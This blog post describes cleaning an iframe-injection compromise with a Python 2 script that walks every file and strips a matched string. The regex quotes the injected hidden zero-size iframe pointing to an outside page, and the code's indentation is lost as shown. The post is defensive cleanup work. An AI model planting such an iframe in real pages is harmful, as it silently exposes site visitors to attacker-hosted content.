|
Find exploit and remove it with python regular expressions |
|
|
I had an explot hit a site that wasn't on one of my servers and there wasn't an backup availalbe to resore from. Still having to fix this I decided to write a script to inspect all the files and remove the bad text. Mostly the exploit appended an iframe at the end of files, but I wrote my script to remove particular text no matter where it sat in the file.
I wrote a bit about a python file structure crawler and I'll include my whole method below for reference.
#!/bin/env python
# By Josh White
#This script will start at the current directory and remove the expliot text
#from all of the files in all files and folders
import re
import os
myre = re.compile(r"""<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>""")
log = []
arglist = []
def check(arg,dirname,fnames):
for file in fnames:
arg.append(os.path.join(dirname,file))
os.path.walk("./",check, arglist)
for filename in arglist:
print filename
if os.path.isfile(filename):
f = file(filename,"r").read()
m = myre.search(f)
if m:
print "Expliot found in " + filename
newfile = f[0:m.start()] + f[m.end():len(f)]
file(filename,"w").write(newfile)
log.append(filename + " was repaired")
file("PYLOG.log","w").writelines(log)
Basically I compile the bad text as a regular expression, then iterate through every file and search for a match. If a match is found I replace the bad file with the file - bad text. I know this will only find the first instance of the bad text and remove it and if there were more instances in a single file they wouldn't be found. You could make the if myre.search into a recursive function, or just run the script multiple times!
|
|
Under Construction
Jibwa.com is under construction. Watch out for broken links, missing pages, potholes and bulldozers. We apologize for the temporary inconvenience - Jibwa.com Staff
News and Updates
Boyd Energy Site
A energy engineer wanted a place to share his knowledge of energy conservation and other building type technologies. Using Joomla 1.5 we have a site u...
Read More ...
Restart Cable Modem and Router
If you have a modem (Cable, DSL, T1, Other), and a router you are probably familiar with the power cycle! The power cycle is three simple steps and ...
Read More ...
Lecture Audio Clip Player
Mark Pirtle Website Russell Public was interested in having Mark's audio samples playable for visitors of the website. In order to do this we had to ...
Read More ...
Plush Animation and demo shot
|
